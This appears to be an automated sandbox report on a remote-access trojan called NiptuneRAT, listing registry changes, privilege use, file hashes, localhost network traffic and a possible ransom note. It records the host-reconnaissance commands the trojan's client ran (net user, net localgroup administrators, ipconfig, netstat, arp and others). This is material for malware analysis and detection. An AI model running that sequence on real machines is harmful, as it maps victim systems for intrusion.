Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 6800310000000000715814ae10004e495054554e7e310000500009000400efbe715801ae715814ae2e000000dca70200000006000000000000000000000000000000796af6004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 020000000100000000000000ffffffff C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Windows\system32\OpenWith.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\NETSTAT.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3356 wrote to memory of 2976 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\SYSTEM32\cmd.exe
PID 3356 wrote to memory of 2976 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\SYSTEM32\cmd.exe
PID 2976 wrote to memory of 5060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2976 wrote to memory of 5060 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2976 wrote to memory of 3936 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\HOSTNAME.EXE
PID 2976 wrote to memory of 3936 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\HOSTNAME.EXE
PID 2976 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 4984 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 4984 wrote to memory of 4340 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4984 wrote to memory of 4340 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 2396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 2396 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2396 wrote to memory of 5068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2396 wrote to memory of 5068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 3036 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 3036 wrote to memory of 1068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3036 wrote to memory of 1068 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 4820 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 4820 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 4820 wrote to memory of 756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 4820 wrote to memory of 756 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 2948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2976 wrote to memory of 2948 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\net.exe
PID 2948 wrote to memory of 112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2948 wrote to memory of 112 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2976 wrote to memory of 1448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 1448 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2976 wrote to memory of 944 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 944 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 696 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 2976 wrote to memory of 696 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ROUTE.EXE
PID 2976 wrote to memory of 3008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ARP.EXE
PID 2976 wrote to memory of 3008 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ARP.EXE
PID 2976 wrote to memory of 1804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\NETSTAT.EXE
PID 2976 wrote to memory of 1804 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\NETSTAT.EXE
PID 2976 wrote to memory of 4504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 4504 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 2976 wrote to memory of 1624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\sc.exe
PID 2976 wrote to memory of 1624 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\sc.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip"

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\$77NiptuneClient.exe

"C:\Users\Admin\Desktop\$77NiptuneClient.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe"

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\HOSTNAME.EXE

hostname

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -an

C:\Windows\system32\ipconfig.exe

ipconfig /displaydns

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pp.anarh.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp
N/A 127.0.0.1:1337 tcp

Files

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 e05e2846c2c4eb4c218634e28031122a
SHA1 daac3911d4aace4b6fcd5c6d5a2adb9950eacfd4
SHA256 178bda21d7735ee8bc2bfb74bc487055853a451ae741b1486fda96125be8e7c4
SHA512 181df2727abdaafb985a84588adac451b0d0031912a556a29b3e9071368022ff8119197a16171eaf43e5dfd42e9cb45c1801373a39907d8689fce40d1cc7ce39

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 c9b1ee4563ecf0789bab3fdc31c7c346
SHA1 370173eb922e0d3d2f1d2393ef2dac604a6abcca
SHA256 783ce12d604d80f75e89cb9b8da650fbd65890ba3ed6c4b1dde3045d0b713052
SHA512 aa78e096bfb4a8cc5ce7b30ad7fd639f2f1106b0402da8ea0941f211d909a4a17cd41b272452d602583ba0083216c1e4ac485d869b9facdd71c78153e21dc208

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config

MD5 465c8716dc52edeaf09f0c61fc988934
SHA1 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b
SHA256 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5
SHA512 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c

C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe

MD5 0da861f192f8e722505826c141c05a40
SHA1 4d717f9d2a64caf68374ed1e246cf38dd208227b
SHA256 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b
SHA512 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280

C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12

MD5 e22a0515af0220bc5c4497f85e518e24
SHA1 2702b7cf46f8ae5ed920469b169c03b07a5d14e7
SHA256 4512413f9478d03074b4bea5deaff1681ec28c74839c16f3cf7d56b0418a8f92
SHA512 cbee300346822a3cd9da43985143258085513bf4515287974f9def05c047477f313648f4017118167f30f1eb241b5c490a11128f98352f96b24f0d2e62840d92

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 77d636e08fe9de62cf19ad656409ccde
SHA1 827de958d0c46346c9c581be646b8c3a61fab648
SHA256 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558
SHA512 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\u04otmyy.newcfg

MD5 67ae3b067855a1e16f01e16ee389c8f0
SHA1 3bef83c7922cda26497a45bbfe209e65b14234a0
SHA256 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a
SHA512 db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699

C:\Users\Admin\Desktop\$77NiptuneClient.exe

MD5 94ac7fdf09c22c9bfd33c451adfc1681
SHA1 7bb6e40d7d2492d09b281fcd64ec94aa47d75e96
SHA256 f7446c1f2f1f0b7882ea06a028c77e17898cdd81b13ad6fd0b92c6d3377bbb9d
SHA512 a532faabbe374c8ceb32d7fd8dc41b853c97e6a5831fbbb0dccfc46dbcc28ed9225959bc4bb2468379d53a0e8548ee592468e1c564f16e1a830205aafe1ca1c2

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\RssCnLKcGRxj.dll

MD5 f6808c4fbbe0275db03b2cc5b4c2bc0d
SHA1 e40b61c64c68f72fc5144f5057d54229babdecf8
SHA256 e204d15f0e7269d364157aaab265a5dfbe7e76c9f6202bf90998f0edd77ca248
SHA512 f077c49f6943d0e40799b3b42d1e11f50dabca48305c36ef2acd3258c990e0e0f982fbb0c27b1243aa15d2ed7b398b70f07dddc9ba76ff032ba74a24c8e08fb4

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll

MD5 e4ebcf76ff80ef398d3ab77d577f4c08
SHA1 cb9e6b30a63d50ae87610f6855b64abfb25691d2
SHA256 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5
SHA512 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll

MD5 6b24cb03ca441f81764f14412abe22c4
SHA1 37eefe413b01080c85f437e5845add5f9e3c2c10
SHA256 057313c967420c8a6ef644a78109af3f681fb332f9e8ebb55e4a29efeb093afe
SHA512 9ef792c0b90f6eb1a6ed23402fd19bcf7ddb48ec0b7a18eaf7d708e873a060b4698e3174400162f2436a0180ebac72400883dd5cebe246a8690a053a431877a7

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll

MD5 cf863d12b476133d97f3827007f53fa1
SHA1 97478287ae4ad542671fce20b39ccc47c230b5d8
SHA256 9e80ce9cd2c8d4b15a1f7326a0b6674f3da617f4704cf5a49bb99b7dceed1b5e
SHA512 9ebfab2f4af63b69156aacbdd6e9f4ff581bb7c1cbf0d4d1f7faa35c838fcfbc77446ae3c735f8bb927c744ae81d9645b2c11c365ac49bb8732523520712ed5d

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\K8oCBS3ThnW0WP.dll

MD5 081ea64eb8b4f333014276d59fdec0b4
SHA1 0791627bb38d6818ceb2bf419f19376aef14e494
SHA256 b5022706fec021abf416d4b4f806485a2915f3a47b71e73241ef73e7845b21f9
SHA512 b5b9e2c1927313919de6ddc8cc5ddc3438846be8817e022f964ec52612f6ad5301a83c88888fffa1cdabc9a29f42431a4c84668987edb32b4bd6587d64dedd54

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll

MD5 7884b35cfe1ba24ad7e4cd78f48a1a09
SHA1 86cf35919ead978c5fe817d6c4f2e18bb32727fb
SHA256 ed4562e5b6527f2ebb2318f83f31a3af4dbe06dbf8e764ebf5706b0790346b88
SHA512 30a57bc171ec76c7295766df01f8970ff98dbb3a13a5c52a1e75329fb45b69b7fa8c199da0cb6648258b90c48c3341c3bde73088e773f5037f3de323192bcf8f

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll

MD5 841ff739bd70a4c6f61a43793feea007
SHA1 ec73f4b50c2e36568bfb21b3f87cb8ca55ae5722
SHA256 cda6e05e54f1da8511958683aa100eb4bc6bb749ad4699676755dda18c152d84
SHA512 086c1ac156b380ce850dcbbbd3ca59477953f665dc592944d851e89aa17f846c94a1003b57f5c842cf3e5536523828b407ee2a0b170f01605d7d72eb5c7db2f8

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll

MD5 ec4f4d4e9f133b53f5cab8a01193bdbc
SHA1 8a9539f232f1ee7437308af216c80efef434b3d7
SHA256 63b132fb283869799d218b453ba8a032b5a2fea372a27871326536776fae9481
SHA512 009967c45320248cbc5dab177f725c8b91e1f540e4651cfc59e25137f8c9933a84580f364057d1f6c11efd783b2bd782ecf7274ef6cf3a45252cf65ae339c6b3

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\KNTmoSnG.AnarHs.dll

MD5 1681e0f3311751361030ff30a957a1ed
SHA1 8f3b55e130af507549817fda37474a1391e6b8f2
SHA256 234724f14dbb999853aeb872d7e6c3ed0b3de5b105009b5c66131a2af8d0dbb4
SHA512 60690b2c1e2816a640f5763f9c20de9a39cb9735ea4a3f0bf4f477d3e184f8791e556313a7523c70ed2fb9182d520842bce70057cedd5cb89b923fd6f9067dd1

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\maSN8TBMgUEC.dll

MD5 d5a278acdafa0c8b4380efb7d83e053e
SHA1 376218e3aa607a3b82be55cfa718826991953654
SHA256 d93d72c6e929bd9cea468458e6c0558908a92f0ecd11f4f4db0f49acfe9d4fc5
SHA512 138def485e02fdcf1809f0d8162fdd2a50575f3cab56968fbc6d09d0c1e9fe6803860315e45c1a7e0eff75958988ed6b08735fa680fa66527630c6789a23a00b

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\oYsKwDG.dll

MD5 19f8d8099cc9b7b6a68e7efebc44ac18
SHA1 5a5cca2ad1168252d79ef7c0ffda58726de7f79c
SHA256 9157a6021901939611c80c4246dbec6007200b2f2457d348ce8834bef9872535
SHA512 6bb58b3157feb010555382c5b5b5d0ee982af324f1d88512ea5d5b984b949995d7387a9496388cb7b9589007ae9ec651e5f8219085517d82eef093e4ebb7ecbc

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\mML6WKMqdxjDGA.dll

MD5 e03b206eec8a7efbd1a47909071226e5
SHA1 21163989ea524920e874bc7932adfcd5e94f854e
SHA256 778877431354a9584325dadb663be077f757227eaae8bcad33e4bf26efd6b965
SHA512 831ed74419f1b4c3250fbff20be16ed7058a851d7168a17e8a4dcf284a19412feee42a8c198af34b37571de33a80c48ac855f5d018ea9e2cfdcd846b832155ff

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\PK0TcnqTGFagQTS.dll

MD5 fa90a2aee0d172000257c4faca31237c
SHA1 b317281b4acaaf1d7b7255c5e92887322abae892
SHA256 991fc53fa1aa7b5cd0b6e19dab536873d68e4413fd55b533601a3a2582d38a49
SHA512 b05c0b52e011089258ad31dd23a1f8a0cc8145b202e42e2a9d4fdf892c12d4a7b5843cc7721041295ab796e8bc98747b9e321c4e54bfd1a7c9a02dd2796fc405

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Recovery.dll

MD5 08131d6801c109f0764a4fe690aba8ef
SHA1 e732af02326483700eda52ff40dc70cff6b7afcb
SHA256 bc3a9390c043f8002e356ad34b2b11d3486682d0c275ab6729bb4a312e324f51
SHA512 228ab0aa0ddfdb0c099f1db5112304d776cb97ab2dab376d38023e446cb2aec30d9585eba444818f3241ffbc28565a1aef11f97b5b42bf57037de8e4a8536e2a

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
